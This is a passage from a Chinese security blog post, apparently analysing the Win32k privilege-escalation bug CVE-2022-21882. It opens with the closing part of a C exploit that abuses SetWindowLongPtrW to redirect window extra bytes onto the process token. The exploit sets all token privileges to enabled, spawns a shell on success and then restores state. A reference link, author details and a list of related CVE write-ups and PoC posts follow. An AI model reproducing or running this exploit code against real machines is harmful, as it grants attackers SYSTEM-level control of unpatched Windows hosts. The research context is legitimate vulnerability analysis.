		gb::NtUserMessageCall(gb::g_hTriggerWnd, WM_CREATE,0,0, NULL, 0, FALSE);

		// 修改 tagWND_victim->ExtraBytes = TokenAddr
		ULONG_PTR Old = SetWindowLongPtrW(gb::g_hTriggerWnd, 0x128+0x10, TokenAddr+0x40);
		// 修改 Token->Privileges.Enabled = 0xFFFFFFFFFFFFFFFF
		SetWindowLongPtrW(gb::g_hVictimWnd, 8, 0xFFFFFFFFFFFFFFFF);
		// 修改 Token->Privileges.Present = 0xFFFFFFFFFFFFFFFF
		SetWindowLongPtrW(gb::g_hVictimWnd, 0, 0xFFFFFFFFFFFFFFFF);

		if (CheckPrivilege(gb::hToken)) {
			SpawnShell();
		}
		else {
			printf("[+] 提权失败!\n");
		} 

		// 恢复 tagWND_Victim->ExtraBytes = Old
		SetWindowLongPtrW(gb::g_hTriggerWnd, 0x128 + 0x10, Old);
		// 恢复 tagWND_Trigger->Styles &= ~0x800
		SetWindowLongPtrW(gb::g_hTriggerWnd, Distance + 0xE8 + 0x10, Trigger->dwExStyle);
		system("pause");
	}
	
	return 0;
}

0x6 演示

在这里插入图片描述

0x7 参考

[1] https://www.anquanke.com/post/id/272305#h3-6

飞鸿踏雪(蓝屏选手)
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2022-26937 Windows NFS 栈溢出漏洞分析
顶峰
01-31 575
运维
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2022-21882 Win32k内核提权漏洞深入分析
二狗的博客
01-30 735
CVE-2022-21882是对CVE-2021-1732漏洞的绕过,属于win32k驱动程序中的一个类型混淆漏洞。攻击者可以在user_mode调用相关的GUIAPI进行内核调用,如xxxMenuWindowProc、xxxSBWndProc、xxxSwitchWndProc、xxxTooltipWndProc等,这些内核函数会触发回调xxxClientAllocWindowClassExtraBytes。攻击者可以通过hook。
CVE-2022-32250漏洞原理
最新发布
2401_84434570的博客
05-07 1019
在nftales中存在着集合(sets),用于存储唯一值的集合。sets提供了高效地检查一个元素是否存在于集合中的机制,它可以用于各种网络过滤和转发规则。而漏洞则是由于nftables在处理set时存在uaf的漏洞。
CVE-2022-21882复现
Misaka10046的博客
05-10 1417
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
CVE-2022–26923漏洞分析
阿道夫的博客
01-31 1123
本次漏洞产生的主要原因是计算机账户关键属性的ACL设置问题和ADCS检查客户端身份不严格导致,结合之前的samAccountName欺骗漏洞,AD域中涉及身份认证标识的问题不止一次,微软在AD域中不用具有唯一性的自动编号字段SID而是其他字段作为身份认证标识在安全方面着实欠妥。本次漏洞利用简单,流量特征不明显难以检测,同时获取的AD域证书有效时间长,因此对于AD域的提权和权限维持都有很高的利用价值。一次,微软在AD域中不用具有唯一性的自动编号字段SID而是其他字段作为身份认证标识在安全方面着实欠妥。
CVE-2022-22947-Spring-Cloud-Gateway 内存马POC
03-29
Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而...
OpenSSL拒绝服务漏洞 (CVE-2022-0778) poc证书
03-24
下载后执行 openssl x509 -in 2022_0778.pem -inform DER -text -noout 或者在自己产品证书管理界面上传证书验证 参考https://github.com/drago-96/CVE-2022-0778 制作证书验证
SpringCloud Function SpEL注入漏洞分析CVE-2022-22963).doc
07-08
SpringCloud Function SpEL 注入漏洞分析CVE-2022-22963) SpringCloud Function 是 Spring 提供的一套分布式函数式编程组件,旨在帮助开发者专注于业务逻辑实现,而不需要关心服务器环境运维等问题。然而,在 ...
CVE-2021-22192:CVE-2021-22192靶场:未授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:未授权用户RCE漏洞 0x10靶场环境 0x20目录结构 CVE-2021-22192 ├── README.md ............... [此 README 说明] ├── imgs .................... [辅助 README 说明的图片] ├── gitlab .................. [Gitlab 容器的挂载目录] │ ├── Dockerfile .......... [Gitlab 的 Docker 构建文件] │ ├── config .............. [Gitlab 配置挂载目录] │ ├── data ................ [Gitlab 数据挂载目录] │ ├── logs ................ [Gitlab 日
CVE-2022-40871 Dolibarr任意添加管理员与RCE漏洞分析
渗透测试研究中心
11-14 3285
0x01 漏洞简介 Dolibarr ERP & CRM <=15.0.3 is vulnerable to Eval injection. By default, any administrator can be added to the installation page of dolibarr, and if successfully added, malicious co...
【春秋云境】CVE-2022-28512
ZXW_NUDT的博客
02-22 2413
【春秋云境】CVE-2022-28512
Cisco RV340命令执行漏洞(CVE-2022-20707)及关联历史漏洞分析
Jinmindong
01-29 460
本篇文章主要是对Cisco RV340命令执行漏洞(CVE-2022-20707)进行的研究分析,尽管利用此漏洞需要身份验证,但可以通过CVE-2022-20705绕过现有的身份验证机制实现无条件的命令执行。历史相关的漏洞还包括:CVE-2020-3451、CVE-2021-1473、CVE-2021-1472,我们会逐一进行分析。可在Cisco官网下载到固件:https://software.cisco.com/download/home/286287791/type/282465789/release/
Bitbucket Server and Data Center命令注入漏洞(CVE-2022-43781)
include_voidmain的博客
12-28 709
跟进看一下命令在哪里执行的以及环境变量用来干什么,在RemoteUserNioProcessConfigurer中的configure方法成功命中断点,这里发现已经传入了git命令,但是漏洞描述说的是使用用户名环境变量造成的注入,所以只需关注环境变量部分。这个函数是\com\atlassian\bitbucket\internal\-process\NioProcessParameters.java中新增的,其中调用的函数对key进行了非空判断,对key和valve都进行了空字节的检测。
CVE-2022-22718:Windows Print Spooler提权
Fly_鹏程万里
04-11 543
2022年02月09日,微软发布了安全更新,修复了48个安全漏洞(不包括22个Microsoft Edge漏洞),其中CVE-2022-22718为Windows后台打印程序特权提升漏洞,CVSS评分7.7。
CVE-2022-42889 Apache Commons Text 漏洞
王嘟嘟的博客
02-28 984
所幸遇到,就简单看看,其中没有啥比较难的地方,仅做记录。10月13日的漏洞。
vluhub漏洞复现笔记:CVE-2022-22965:Spring Framework
weixin_46497491的博客
02-09 523
vluhub漏洞复现笔记:CVE-2022-22965:Spring Framework
CVE-2022-26134的poc
04-20
很抱歉,我无法提供CVE-2022-26134的POC(Proof of Concept)或相关信息。CVE-2022-26134是一个真实存在的漏洞编号,但我无法直接提供具体的POCCVE-2022-26134是由CVE(Common Vulnerabilities and Exposures)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值